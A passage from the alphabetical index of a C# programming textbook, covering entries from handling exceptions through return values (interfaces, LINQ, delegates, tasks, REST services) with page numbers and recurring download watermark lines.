handling exceptions. See exceptions
HashSet<T> class, 412
Haskell, 423–424
HasValue property, 192
heap
boxing and, 199–200, 207
purpose of, 196–198
storing data on, 198–199
unboxing, 200–201
Hello World console application. See TestHello project
hexadecimal notation, 364
hierarchies, inheritance, 137
hill-climbing algorithm, 528–529
HTTP DELETE requests, 733
Download from finelybook [email protected]
1130
HTTP POST requests, 733
HTTP PUT requests, 733
Hungarian notation, 38, 291
hyphen (-)
compound subtraction (-=) operator, 116, 455, 467, 476
decrement (--) operator, 56–57, 59, 116, 146, 508–509
subtraction (-) operator, 47
I
IAsyncResult design pattern, 584–585
IColor interface, 296–304
IColor.SetColor method, 300, 302
ICommand interface, 675–678, 701
IComparable interface, 290–291, 391–393
IComparable<Employee> interface, 492
IComparable<T> interface, 391–393
IComparer interface, 406
IComparer<T> interface, 406
idempotency, REST web services and, 733–741
identifiers
constantExpression, 107–108
defined, 36
syntax of, 36
table of, 37
IDisposable interface, 324, 328–330
IDisposable.Dispose method, 440
IDraw interface, 296–304
IDraw.Draw method, 299, 301
IDraw.SetLocation method, 299
IEnumerable interface, 435, 436, 441–443. See also LINQ (Language-
Integrated Query)
Download from finelybook [email protected]
1131
IEnumerable<T> interface, 405
IEnumerator<T> interface, 436
if statements
blocks, 100–101
cascading, 101–106
common errors in, 100
if…else, 203
syntax, 99–100, 112–113
when to use, 99
ILandBound interface, 291–292
Implement Interface Wizard, 292
implicit conversions, 517
implicit interface implementation, 291–292
implicit keyword, 518, 522
implicitly typed arrays, 232–233
implicitly typed local variables, 57–58
in keyword, 407, 409
increment (++) operator, 56–57, 59, 116
checked expressions, 146
declaring, 508–509
incrementing variables, 56–57, 59, 116
indexers
accessor methods, 368–369
arrays compared to, 369
in classes or structures, 379
creating, 366–368, 378
defined, 363
explicit interface implementation, 372, 379
in interfaces, 371–372, 379
properties and, 370–371
quick reference, 378–379
read-only, 369
Download from finelybook [email protected]
1132
in Windows applications, 372–378
write-only, 369
Indexers project, 372–378
IndexOf method, 374
IndexOutOfRangeException, 233, 563
inequality (!=) operator, 96, 99, 112, 510
infinite values, 49
information hiding. See encapsulation
inheritance. See also interfaces
class assignment, 271–273
declaring, 268–269, 288
defined, 267–268
exceptions, 137
interface extension, 292
method declarations, 270–271, 288
extension methods, 283–287, 288
method signatures, 273
new methods, 273–274
override methods, 275–276, 288
virtual methods, 274–275, 277, 288
polymorphism, 277
protected access, 278–283
quick reference, 288
System.Object root class, 270
System.ValueType abstract class, 269
Windows Runtime compatibility, 311–313
initializing
arrays, 231–232, 252
collections, 422–423
objects, 356–358, 361
structure variables, 227
structures, 219–223
Download from finelybook [email protected]
1133
variables, 189–190, 441
initiateTasks method, 552
InnerException property, 141
INotifyPropertyChanged interface, 665–668, 700
Insert method, 394–395, 413, 432
InsertIntoTree method, 400–402
InstallCommandDefinitionsFromStorageFileAsync method, 691
installing packages, 70
instance methods, 170
instantiating
arrays, 230–231, 252
delegates, 475
int data type
arithmetic operators and, 49–54
in array arguments, 256–257
binary values
displaying, 365
manipulating, 365–366
storing, 364
checked versus unchecked arithmetic, 144–145
converting double type to, 517
converting strings to, 47, 59
converting to double, 517
minimum/maximum value of, 144
overview, 40
in parameter arrays, 257–258
uint (unsigned int), 364
int keyword, 215, 398
Int32 structure, 214
Int32.Parse method, 47, 59
Int64 structure, 214
IntBits structure, 367–368
Download from finelybook [email protected]
1134
IntelliSense icons, 11
interface keyword, 290, 314
interface properties
declaring, 348–349, 361
implementing, 349
interfaces
defining, 290–291, 296–304, 314
extension, 292
generic
contravariance, 406–408, 409
covariance, 404–405, 409
variance, 402–404
IColor, 296–304
ICommand, 675–678, 701
IComparable, 290–291
IComparer, 406
IComparer<T>406
IDisposable, 324, 328–330
IDraw, 296–304
IEnumerable, 435, 436, 441–443
IEnumerable<T>405
IEnumerator<T>436
ILandBound, 291–292
implementing, 314
explicit implementation, 293–295
Implement Interface Wizard, 292
implicit implementation, 291–292
indexers in, 371–372, 379
INotifyPropertyChanged, 665–668, 700
IRawInt, 371–372
IRetrieveWrapper<T>404–405
IScreenPosition, 348–349
Download from finelybook [email protected]
1135
IStoreWrapper<T>404–405
IWrapper, 403–404
multiple, 293
naming conventions, 291
overview, 289–290
properties
declaring, 348–349, 361
implementing, 349
quick reference, 314
referencing classes through, 292–293
restrictions on, 295–296
System.IComparable, 391–393
System.IComparable<T> interface, 391–393
interpolation, string, 48
Intersect method, 491
IntersectWith method, 421–422
InvalidCastException, 201, 384, 404
InvalidOperationException, 151–152, 153, 413, 440
invalidPercentage method, 97
Invoke method, 546, 565
invoking methods. See calling methods
IRawInt interface, 371–372
IRetrieveWrapper<T> interface, 404–405
is operator, 202, 207
IsAdding property (ViewModel), 735
IsAddingOrEditing property (ViewModel), 735, 745
IsAtEnd property (ViewModel), 680
IsAtStart property (ViewModel), 680
IsBrowsing property (ViewModel), 734–735
_isBusy field, 746
IsBusy property (ViewModel), 746
IsCardAlreadyDealt method, 244, 430
Download from finelybook [email protected]
1136
IScreenPosition interface, 348–349
IsEditing property (ViewModel), 735
IsNullOrEmpty method, 376
IsProperSubsetOf method, 421
IsProperSupersetOf method, 421
IsSubsetOf method, 421
IsSuitEmpty method, 243–244
IsSupersetOf method, 421
IStoreWrapper<T> interface, 404–405
iteration
do statements
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
exiting
break statement, 124
continue statement, 124
Parallel.For method, 557–558
quick reference, 132
for statements
blocks, 122
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
through arrays, 233–235, 252, 557–558
through collections, 433
Dictionary<TKey, TValue>419
LinkedList<T> class, 415–416
List<T> class, 414
parallelized query over simple collection, 585–590
Download from finelybook [email protected]
1137
SortedDictionary<TKey, TValue>420
while statements
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
iterators
defined, 443
defining enumerators with, 445–447
simple example, 443–445
IWrapper interface, 403–404
J
jagged arrays, 239–240, 253
Join method, 488, 502
join operator, 490, 502
joining data, 487–488, 502
K
KeyValuePair<TKey, TValue> class, 420
keywords. See also operators; statements
abstract, 306, 313, 314
async, 571–572, 608
base, 270, 275, 288
bool, 215
byte, 215
case, 107
Download from finelybook [email protected]
1138
checked, 144–145, 156
expressions, 146–148
statements, 145
class, 160–161
const, 175, C07.0765
decimal, 215
default, 107, 441
defined, 36
delegate, 454, 475
double, 215
enum, 210, 227
explicit, 518, 522
float, 215
implicit, 518, 522
in, 407, 409
int, 215, 398
interface, 290, 314
long, 215
namespace, 15
new, 232, 315
array creation, 230, 252
class creation, 161, 179
delegate creation, 450–451, 475
method declarations, 273–274, 313
object creation, 197, 271
objects, 271
object, 199, 215
operator, 504, 518
out, 194–195, 207, 405, 409
override, 275–276, 288, 307, 313
params, 256, 258, 731
partial, 166
Download from finelybook [email protected]
1139
private, 65, 162–163, 278, 313
protected, 278, 313
public, 162–163, 164, 278, 313, 505, 522
ref, 193–194, 207
sbyte, 215
sealed, 306–307, 313, 314
short, 215
static, 522
StaticResource, 647
string, 184, 215
struct, 216, 227
table of, 36–37
this, 284, 288, 368, 378
uint, 215
ulong, 215
unchecked, 144–145
expressions, 146–148
statements, 145
unsafe, 205–206
ushort, 215
value, 369
var, 54, 62, 179, 484
virtual, 275, 288, 313
void, 63
when, 138–142
where, 401, 408, 489, 501
yield, 444, 448
L
lambda (=>) operator, 64, 425
lambda calculus, 425
Download from finelybook [email protected]
1140
lambda expressions
anonymous methods and, 426–427
defined, 423–424
delegates and, 464
features of, 426
forms of, 425–426
syntax, 424–425
Land method, 279
language interoperability, operators and, 507
Language-Integrated Query. See LINQ (Language-Integrated Query)
Download from finelybook [email protected]
1141
left-shift (<<) operator, 365
length of arrays, finding, 233, 252
Length property (arrays), 233, 252
less than (<) operator, 96, 99, 112
less than or equal to (<=) operator, 96, 99, 112
libraries
assemblies
core, 17
defined, 7–8
namespaces and, 17
references for, 17
class, 391
GDI (Graphics Device Interface), 33
life cycle of UWP applications, 613
LinearGradientBrush, 659
LinkedList<T> class, 412, 415–416
LINQ (Language-Integrated Query). See also IEnumerable interface
data aggregation, 485–487
data filtering, 484–485, 501
data grouping, 485–487, 501
data joins, 487–488, 502
data ordering, 485–487, 501
data selection, 482–484, 501
deferred evaluation, 497–500
defined, 479–480
examples of, 480–482
order of expressions, 491
PLINQ (Parallel LINQ)
overview, 585
parallelized query over simple collection, 585–587
parallelized query that joins two collections, 587–590
query cancellation, 587–590
Download from finelybook [email protected]
1142
quick reference, 608
query operators, 489–491
quick reference, 501–502
Tree<TItem> objects and, 491–497
Linq namespace, 489
List<T> class, 412, 413–416
ListenFor element (CustomerVoiceCommands.xml), 689
literals, enumeration
names, 210
values, 211
local scope, 71
local variables
implicitly typed, 57–58
unassigned, 40
lock statement, 332–333, 593, 609
locking data, 593–594, 607, 609
logical operators, 97
logical AND (&&), 97
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
logical OR (||)
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
long data type, 40
long keyword, 215
loops
do
blocks, 124
Download from finelybook [email protected]
1143
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
exiting
break statement, 124
continue statement, 124
for
blocks, 122
Cards project, 247–248
iteration through arrays, 233–235
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
foreach, 234–235, 252, 433
canceling, 557–558
Dictionary<TKey, TValue>419
LinkedList<T> class, 415
List<T> class, 413
Stack<T> class, 417–418
Parallel.For method, 557–558
quick reference, 132
while
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
< entity, 109
Download from finelybook [email protected]
1144
M
MachineOverheating event, 466, 467
macros, varargs, 258
Main method, 35
array parameters, 236
asynchronous operations and, 573
BinaryTreeTest project, 398–399, 402
console applications, 8–10
MainPage.xaml files, 27–28, 639
MainPage.xaml.cs file, 27–28
Mammal class
base-class constructors, 270
declaring, 268–269
managed code, 226
managed execution environment, 226
Manifest Designer, 614
ManualResetEventSlim class, 594, 609
Math class
PI field, 160, 175
Sqrt method, 171, 173–174
mathematical operators. See arithmetic operators
MathsOperators project
creating, 49–54
exception handling, 139–142, 149–151
MaxValue property (int data type), 144
memory
allocation, asynchronous methods and, 582–583
boxing, 199–200, 207
garbage collection, 189–190, 324. See also destructors
advantages of, 318–320
finalization, 320
Download from finelybook [email protected]
1145
forcing, 320
freachable queue, 320–321
how it works, 320–321
object lifetimes and, 319
when to use, 321
heap
purpose of, 196–198
storing data on, 198–199
OutOfMemoryException, 198
pointers, 204–206
resource management, 321–324
disposal methods, 321–322
Dispose method, 324–326
exception-safe disposal, 322–323, 326–328, 335
IDisposable interface, 324, 328–330
preventing objects being disposed of more than once, 330–332
thread safety, 332–333
using statements, 323–324, 335
verifying disposal after exception, 333–334
stack
purpose of, 196–198
storing data on, 198–199
unboxing, 200–201
MessageDialog object, 580
methods. See also individual method names
abstract, 306
accessor
indexers, 368
properties, 342–343
adapters, 464–465
anonymous, 426–427
asynchronous
Download from finelybook [email protected]
1146
common errors with, 579–580
Main method and, 573
overview, 567, 568
problem solved by, 568–577
return values, 578–579
scalability and, 568
Windows Runtime APIs and, 580–582
calling, 93
generics, 409
multiple return values, 68–70, 93
from other objects, 68
syntax, 65–68
constructors
base-class, 270–271, 288
calling, 181
declaring, 163–164, 180
default, 164
order of, 165
overloading, 164–165
public versus private, 164
declaring, 62–63, 93
extension methods, 283–287, 288
new methods, 273–274
override methods, 275–276, 288
virtual methods, 274–275, 277, 288
deconstructors, 172–173
defined, 61
defining, 313
delegates
Action<T, …>452
adding methods to, 455
in automated factory scenario, 453–456
Download from finelybook [email protected]
1147
declaring, 450–451, 454, 456–464, 475
defined, 450
examples of, 451–452
Func, 451–452
Func<T, …>452
function pointers compared to, 451
instantiating, 475
invoking, 454–455, 475
lambda expressions and, 464
method adapters, 464–465
overview, 450–451
performCalculationDelegate, 450–451
quick reference, 475
removing methods from, 455
destructors
calling, 335
restrictions on, 317–318
writing, 316–318, 335
expression-bodied, 64–65, 93
extracting, 78
generics
calling, 409
creating, 399–400, 408
InsertIntoTree, 400–402
global, 62
instance, 170
length of, 65
naming conventions, 62
nesting, 81–84, 94
overloading, 72–73, 255–256
override
declaring, 275–276, 288
Download from finelybook [email protected]
1148
sealed override, 307
parameters
defining, 62
named arguments, 86–92, 94
optional, 84–86, 87–92, 94
public versus private, 162
quick reference, 93–94
refactoring, 78
replacing with properties, 349–353
returning values from, 93
method declarations, 63–64
multiple return values, 68–70
return types, 235–236
void keyword, 63
scope
class, 72
local, 71
overview, 71
sealed, 307
serializing, 607
signatures, 273
static, 173–174, 181
stepping through, 78–81, 94
syntax, 62–63
WriteLine, 73
writing, 73–77
Methods project
expression-bodied methods, 64–65
method calls, 67
multiple return values, 68–70
Microsoft Patterns & Practices Git repository, 568
Microsoft Visual Studio 2017. See Visual Studio 2017
Download from finelybook [email protected]
1149
Min method, 256–257
MinValue property (int data type), 144
Model-View-ViewModel (MVVM) pattern, 657–658
modulus operators
compound modulus (%=), 116
modulus (%), 48
Moore, Gordon E.526
Moore's Law, 526
MoveNext method, 436, 439, 448
mscorlib.dll file, 17
multicore processors, 526–527. See also tasks
multidimensional arrays, 238, 253, 258
multiple interfaces, 293
multiple return values, calling, 68–70, 93
multiplication (*) operator, 47
multiplyValues method, 53
multitasking
advantages of, 525–526
multicore processors, 526–527
.NET Framework and, 527
tasks
abstracting, 545–549
canceling, 551–561, 566
continuations, 530–531, 563–564, 565
CPU bottlenecks, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted, 557, 563–564
Parallel class, 545–551
parallelism, 531–538, 545–551, 565
quick reference, 564–566
running, 530, 564
Download from finelybook [email protected]
1150
synchronizing, 531
Task class, 528–529
threads, 528–529
waiting for, 531, 564–565
MVVM (Model-View-ViewModel) pattern, 657–658
N
Name structure, 373
named arguments
interfaces, 291
passing, 86–87, 94
resolving ambiguities with, 87–92
nameof operator, 668–669
namespace keyword, 15
namespaces
assemblies and, 17
bringing into scope, 15
Collections, 412
declaring, 616
defining classes in, 14–15
Generic, 386–387, 411
Linq, 489
longhand names, 16
Numerics, 511
Tasks, 527
Threading, 528, 594
naming conventions
camelCase, 163
case sensitivity, 36
fields, 343–344
methods, 62
Download from finelybook [email protected]
1151
operators, 505
PascalCase, 163
properties, 343–344
reserved words, 36–37
variables, 38
NaN (not a number), 49
narrowing conversions, 517
native code, 226
Navigate element (CustomerVoiceCommands.xml), 689
Navigate method, 693, 697
NavigationArgs class, 698
NegInt32 class, 283–284
nesting
if statements, 101–106
methods, 81–84, 94
while statements, 117
.NET Core template, 4
.NET Framework. See also multitasking
CLR (common language runtime), 85
IAsyncResult design pattern, 584–585
Windows Runtime, compatibility with, 226, 311
New command (File menu), 4
new keyword, 232, 315
array creation, 230, 252
class creation, 161, 179
delegate creation, 450–451, 475
method declarations, 273–274, 313
object creation, 197, 271
New Project dialog box, 4–5, 18, 34
New Universal Windows Project dialog box, 615
Next buttons, adding to forms, 682–685
Next method, 231, 680–681
Download from finelybook [email protected]
1152
NextCustomer command, 679–682
NextCustomer property (ViewModel), 681–682
NodeData property (Tree<TItem> class), 393–394
nodes, binary tree, 388
NOT (!) operator, 96
NOT (~) operator, 365
NotImplementedException, 243, 299, 439
NotOnCanceled option (ContinueWith method), 531
NotOnFaulted option (ContinueWith method), 531
NotOnRanToCompletion option (ContinueWith method), 531
NuGet Package Manager, 70, 727
null strings, 376
null values
null-conditional (?) operator, 190–191, 207
overview, 189–190
testing for, 190–191
nullable types
enumerations, 210
structures, 218
nullable values
overview, 191–192
properties of, 192–193
null-conditional (?) operator, 190–191, 207
NullReferenceException, 190
NumCircles field (Circle class), 174–175
numeric values
converting strings to, 47
infinite values, 49
primitive data types
displaying values of, 41–46
table of, 40
specifying, 39–40
Download from finelybook [email protected]
1153
Numerics namespace, 511
O
Object class, 199, 270
object initializers, 357
object keyword, 199, 215
ObjectComparer object, 406
objectCount field (Point class), 177–178
ObjectCount method, 178
Object.Finalize method, 318
objects. See also classes
calling methods from, 68
CancellationToken, 551–552, 590
CancellationTokenSource, 590, 610
cardsInSuit, 428
casting, 202
InvalidCastException, 201
is operator, 202
as operator, 202–203
quick reference, 207
switch statement, 203–204
classes compared to, 161
creating, 315–316
deconstructing, 172–173
destroying, 316
Dispatcher, 571
initializing with properties, 356–358, 361
lifetime of, 319
MessageDialog, 580
ObjectComparer, 406
passing by reference, 189
Download from finelybook [email protected]
1154
speechRecognitionResult, 691
StopWatch, 534
Task
abstracting, 545–549
canceling, 551–561, 566
continuations, 530–531, 563–564, 565
CPU bottlenecks, identifying, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted, 557, 563–564
parallelism, 531–538, 545–551, 565
running, 530, 564
synchronizing, 531
waiting for, 531, 564–565
TaskCreationOptions, 530
ViewModel, 734–740
adding commands to, 675–685
adding/editing data with, 731
creating, 671–675
error reporting, 743–746
MVVM (Model-View-ViewModel) pattern, 657–658
UI updates, 746–748
VoiceCommandActivatedEventArgs, 691
WriteableBitmap, 532, 582
obo prefix, 364, 378
on clause, 491
OnActivated method, 691–692, 697
OnLaunched method, 690
OnlyOnCanceled option (ContinueWith method), 531
OnlyOnFaulted option (ContinueWith method), 531
OnlyOnRanToCompletion option (ContinueWith method), 531
OnNavigatedTo method, 694, 699
Download from finelybook [email protected]
1155
OnPropertyChanged method, 666–668, 679
openFileClick method, 119
OperationCanceledException, 559–560, 596
operator keyword, 504, 518
operators
arithmetic
applying to int values, 49–54
associativity, 54–56
data types and, 47–49
overview of, 47
precedence, 54, 59
prefix and postfix forms, 56–57
as, 202–203, 207
assignment (=)
associativity, 54–56
overview, 39
associativity, 98–99, 503
await, 555, 564, 572–574, 608
binary, 504
bitwise, 365–366
Boolean
associativity, 98–99
conditional logical operators, 97
defined, 96
equality operators, 96
precedence, 98–99
relational operators, 96
short-circuiting, 97–98
comparing in structures and classes, 509–510
compound assignment
associativity, 116
delegates and, 455
Download from finelybook [email protected]
1156
evaluation of, 507–508
events and, 466, 476
examples of, 132
overview, 115–116
precedence, 116
table of, 116
constraints, 504
conversion
built-in, 517
narrowing conversions, 517
overview, 516–517
user-defined, 518
widening conversions, 517
writing, 519–521, 522
decrement (--), 56–57, 59, 116, 508–509
dot (.), 316
equality (==), 96, 99, 112, 510
equals, 490
from, 489, 501
group by, 489, 501
implementing, 511–516, 522
increment (++), 56–57, 59, 116, 508–509
is, 202, 207
join, 490, 502
lambda (=>), 425
language interoperability and, 507
nameof, 668–669
naming conventions, 505
NOT (!), 96
null-conditional (?), 190–191, 207
orderby, 489, 501
overloading
Download from finelybook [email protected]
1157
constraints, 504
syntax, 504–505
pairs of, 510
precedence, 98–99, 503
prefix, 56–57
public, 505
query, 489–491
quick reference, 59, 522
select, 489, 501
static, 505
structures and, 216
symmetric, 506–507, 519
unary, 56, 504
where, 489, 501
optional parameters, 263–265
defining, 86, 94
resolving ambiguities with, 87–92
when to use, 84–86
optMethod method, 86–88
OR operators
OR (|), 365
logical OR (||)
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
Order Placed dialog box, 458
OrderBy method, 485–486, 501
orderby operator, 489, 501
OrderByDescending method, 486
ordering data, 485–487, 501
OrdersInMemory class, 588
Download from finelybook [email protected]
1158
out keyword, 194–195, 207, 405, 409
out parameters, 194–195, 207
OutOfMemoryException, 198, 238, 533
Output window, 12
OverflowException, 135, 144–149, 517
checked expressions, 146–148
checked statements, 145
overloading
constructors, 164–165
methods, 72–73, 255–256
operators
constraints, 504
syntax, 504–505
overpartitioning, 529
override keyword, 275–276, 288, 307, 313
override methods
declaring, 275–276, 288
sealed override, 307
overriding operators
equality (==) operator, 510
inequality (!=) operator, 510
operator precedence, 54, 59
P
Pack class, 242–243, 428
package managers, NuGet, 70, 727
Package.appxmanifest file, 614
packages
System.ValueType, 173
ValueTuple, 70
pairs, operator, 510
Download from finelybook [email protected]
1159
Parallel class
abstracting classes with, 545–549
ForEach<T> method, 546, 565
Invoke method, 546, 565
For method, 545–546, 565
when to use, 549–551
Parallel LINQ. See PLINQ (Parallel LINQ)
Parallel.For method
canceling, 557–558
syntax, 565
when to use, 545–546
Parallel.ForEach<T> method, 546, 565
Parallel.Invoke method, 546
parallelism
CPU bottlenecks, identifying, 533–545
implementing, 531–538, 565
Parallel class, 545–551
PLINQ (Parallel LINQ)
overview, 585
parallelized query over simple collection, 585–587
parallelized query that joins two collections, 587–590
query cancellation, 587–590
ParallelLoop project, 549
ParallelPI method, 603–604, 607
ParallelTest method, 592–593
ParamArray project, 260–263, 264–265
parameter arrays
advantages of, 255
declaring, 257–259, 266
int data type in, 257–258
optional parameters compared to, 263–265
params object[]259–260
Download from finelybook [email protected]
1160
priority of, 259
quick reference, 266
Sum method used with, 260–263
parameters (method), 62
arrays as, 235–236
defining, 62
named arguments, 94
passing, 86–87
resolving ambiguities with, 87–92
optional, 263–265
defining, 86, 94
resolving ambiguities with, 87–92
when to use, 84–86
out, 194–195, 207
parameter arrays
advantages of, 255
declaring, 257–259, 266
int data type in, 257–258
optional parameters compared to, 263–265
params object[]259–260
priority of, 259
quick reference, 266
Sum method used with, 260–263
ref
creating, 193–194, 207
overview, 193
Parameters project, 195–196
Parameters project, 186–188, 195–196
params arrays. See parameter arrays
params keyword, 256, 258, 731
params object[]259–260
parentheses ()
Download from finelybook [email protected]
1161
in if statements, 100
in method calls, 62, 66
precedence override, 54
parse method, 47
partial classes, 165–172
partial keyword, 166
PascalCase naming scheme, 163
Pass class
Reference method, 188
Value method, 186–187
passing
arrays, 235–236
named arguments, 86–87, 94
by reference, 189
Peek Definition window, 90
percent sign (%)
compound modulus (%=) operator, 116
modulus (%) operator, 48
Performance Explorer, identifying CPU bottlenecks with, 533–545
performCalculationDelegate, 450–451
period (.)
dot notation, 284
dot operator, 316
phone book project, 372–378
PhoneNumber structure, 373–375
PhraseTopic element (CustomerVoiceCommands.xml), 688, 689
pi, calculating
with parallel tasks, 603–605
with single thread, 600–603
PI field (Math class), 160, 175
PickMultipleFilesAsync method, 581
PickSingleFileAsync method, 581
Download from finelybook [email protected]
1162
pipe (|)
logical OR (||) operator
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
OR (|) operator, 365
PlayingCard class, 241–242, 429–430
PLINQ (Parallel LINQ)
overview, 585
parallelized query over simple collection, 585–587
parallelized query that joins two collections, 587–590
query cancellation, 587–590
quick reference, 608
PLINQ project, 586–587
plotButton_Click method, 533, 545, 554–555, 575–576, 577
plotXY method, 535
plus sign (+)
addition (+) operator, 47
compound addition (+=) operator, 116, 466, 476
increment (++) operator, 56–57, 59, 116, 146, 508–509
Point class
declaring, 167–171
deconstructor, 172
objectCount field, 177–178
ObjectCount method, 178
pointers
function, 451
memory, 204–206
pointsList collection, 605
Polygon class, 358–359
polymorphism
Download from finelybook [email protected]
1163
virtual methods and, 277
Windows Runtime compatibility, 311–313
Pop method, 411–412
populating arrays, 231–232
POST requests, 733
PostCustomer method, 721, 740, 741
PostCustomerAsync method, 740
PostCustomerWithHttpMessagesAsync method, 742
postfix form of operator, 56–57
precedence of operators, 503
Boolean operators, 98–99
compound assignment operators, 116
controlling, 54, 59
table of, 98–99
predicates, 423–425
prefix form of operator, 56–57
Previous buttons, adding to forms, 682–685
Previous method, 680–681
PreviousCustomer command, 679–682
PreviousCustomer property (ViewModel), 681–682
primary operators
associativity, 98
precedence, 98
primitive data types
displaying values of, 41–46
table of, 40
PrimitiveDataTypes project, 41–46
privacy, data, 185–186
private classes, 162–163
private constructors, 164
private fields, 162
private keyword, 65, 162–163, 278, 313
Download from finelybook [email protected]
1164
ProcessData method, 235
processors, multicore, 526–527. See also tasks
Profiling Reports, 539–544
Program class, 187
ProgressRing control, 747
projects. See also AdventureWorksService project; Customers application
AuditService, 459
AutomaticProperties, 358–359
BinaryTree, 392–396, 445–447
BinaryTreeTest, 396–399
BuildTree, 400–402
CalculatePI, 600–603
Cards, 240–248
AddCardToHand method, 246
collection classes, 427–431
DealCardFromPack method, 243
dealClick method, 246
IsCardAlreadyDealt method, 244
IsSuitEmpty method, 243–244
for loop, 247–248
Pack class, 242–243
PlayingCard class, 241–242
randomCardSelector variable, 242
ToString method, 245
Value enumeration, 241
CheckoutService, 461–463
Classes, 166–172
ComplexNumbers, 511–514
Customers, 734–740
error reporting, 742–746
UI updates, 746–749
DailyRate
Download from finelybook [email protected]
1165
application logic, 73–74
method declarations, 74–77
optional parameters and named arguments, 88–92
stepping through, 78–81
DataTypes, 459
Delegates
delegates, 457–460
events, 470–475
DeliveryService, 459
DoStatement, 125–131
Drawing
abstract classes, 307–311
interfaces, 296–304
properties, 349–353
EnumeratorTest, 442–443
ExtensionMethod, 285–287
Factorial, 82–84
GarbageCollectionDemo, 326–333
GraphDemo
asynchronous methods, 575–577
parallelism, 532–538, 547–549
task cancellation, 553–557, 560–561
Indexers, 372–378
MathsOperators
exception handling, 139–142, 149–151
parallelized query that joins two collections, 49–54
Methods
expression-bodied methods, 64–65
method calls, 67
multiple return values, 68–70
ParallelLoop, 549
ParamArray, 260–263, 264–265
Download from finelybook [email protected]
1166
Parameters, 186–188, 195–196
PLINQ, 586–587
PrimitiveDataTypes, 41–46
QueryBinaryTree, 491–497, 498–500
Selection, 102–106
StructsAndEnums, 212–214, 220–223, 224–225
SwitchStatement, 109–112
TestHello console application, 3–17
building and running, 11–14
files, 7–8
IntelliSense icons, 11
Main method, 8–10
TODO comments in, 167
Vehicles, 278–283
WhileStatement, 118–121
propagating exceptions, 142–144
properties
accessibility of, 346
accessing, 344
accessors, 342–343
automatic, 353–355, 358–359, 361
declaring
automatic, 353–355, 358–359, 361
read-only, 345, 360
syntax, 341–342, 360
write-only, 345, 360
defined, 341
in expressions, 344
HasValue, 192
implementing, 361
indexers and, 370–371
interface properties
Download from finelybook [email protected]
1167
declaring, 348–349, 361
implementing, 349
naming conventions, 343–344
nullable types, 192–193
object initialization with, 356–358, 361
quick reference, 360–361
read-only, 345, 360
replacing methods with, 349–353
restrictions on, 346–347
static, 344
Value, 192
when to use, 347–348
write-only, 345, 360
Properties file, 7
PropertyChanged event, 666, 679
protected access, 278–283
protected keyword, 278, 313
public classes, 162–163
public constructors, 164
public fields, 162
public keyword, 162–163, 164, 278, 313, 505, 522
public operators, 505
Publish Web wizard, 724
Push method, 411–412
PUT requests, 733
PutCustomer method, 721
PutCustomerAsync method, 740
Q
query expressions (LINQ). See also IEnumerable interface; PLINQ (Parallel
LINQ)
Download from finelybook [email protected]
1168
data aggregation, 485–487
data filtering, 484–485, 501
data grouping, 485–487, 501
data joins, 487–488, 502
data ordering, 485–487, 501
data selection, 482–484, 501
deferred evaluation, 497–500
defined, 479–480
examples of, 480–482
order of, 491
query operators, 489–491
quick reference, 501–502
Tree<TItem> objects and, 491–497
query operators, 489–491
QueryBinaryTree project, 491–497, 498–500
question mark (?)
indicating nullable types with, 191–192
nullable types, indicating with, 210
null-conditional (?) operator, 190–191, 207
queue, freachable, 320–321
Queue class
creating with generics, 384–387
creating with object type, 381–384
Queue<T> class, 385, 412, 416–417
Quick Find dialog box, 43
Quick Replace dialog box, 43
QuickWatch dialog box, 140
quotation marks, double (")
as delimiters, 111
in XML, 109
quotation marks, single ('), 111
Download from finelybook [email protected]
1169
R
raising events, 467, 469–475, 477
Random class, 231
randomCardSelector variable, 242
RanToCompletion task status, 557
ReadData method, 235
readDouble method, 74–76
reader.Dispose method, 120, 154–155
reader.ReadLine method, 120
ReaderWriterLockSlim class, 595, 609
ReadLine method, 76, 120, 322
read-only indexers, 369
read-only properties, 345, 360
Rectangle control, 659
ref keyword, 193–194, 207
ref parameters
creating, 193–194, 207
overview, 193
Parameters project, 195–196
refactoring code, 78
reference, passing by, 189
Reference Manager dialog box, 397
Reference method, 188
reference types. See also classes
copying, 183–189
defining, 183
value types compared to, 183–185
references
to assemblies, adding, 17
to classes, 292–293
dangling, 251, 319
Download from finelybook [email protected]
1170
References folder, 7–8
registration of voice commands, 690–691
relational operators, 96
associativity, 99
precedence, 99
remainder (%) operator, 48
remainderValues method, 53
remote databases, accessing, 703
data retrieval, 703–709
Entity Framework, 704
entity model, creating, 709–717, 750
quick reference, 750–751
REST web services
adding/editing data with, 733–741, 751
Azure API app security, 729–730
creating, 718–724, 750
deploying to Azure, 724–726, 750
error reporting, 742–746
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732, 750
UI updates, 746–749, 751
Remove method, 413, 415, 421, 432, 455
RemoveFirst method, 415
RemoveLast method, 415
RemoveParticipant method, 596
removing
collection elements, 432
HashSet<T>421
LinkedList<T> class, 415
List<T> class, 413
methods from delegates, 455
Download from finelybook [email protected]
1171
RenderTransform property, 651
Representational State Transfer. See REST (Representational State Transfer)
web services
requestPayment method, 460
reserved words. See keywords
Reset method, 436, 439, 448
resource management
disposal methods, 321–322
Dispose method, 324–326
exception-safe disposal, 322–323, 326–328, 335
IDisposable interface, 324, 328–330
preventing objects being disposed of more than once, 330–332
quick reference, 335
thread safety, 332–333
using statements, 323–324, 335
verifying disposal after exception, 333–334
responsiveness, improving through multitasking, 525
REST (Representational State Transfer) web services
adding/editing data with, 733–741, 751
Azure API app security, 729–730
creating, 718–724, 750
deploying to Azure, 724–726, 750
error reporting, 742–746
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732, 750
UI updates, 746–749, 751
RetrieveValue method, 583
retrieving data with REST web services, 703–709, 726–732, 750
creating, 718–724
deploying to Azure, 724–726
retrieving data with, 726–732
Download from finelybook [email protected]
1172
return statement, 63–64, 93, 109
return values (method), 62
arrays as, 235–236
asynchronous methods, 578–579
method declarations, 63–64, 93
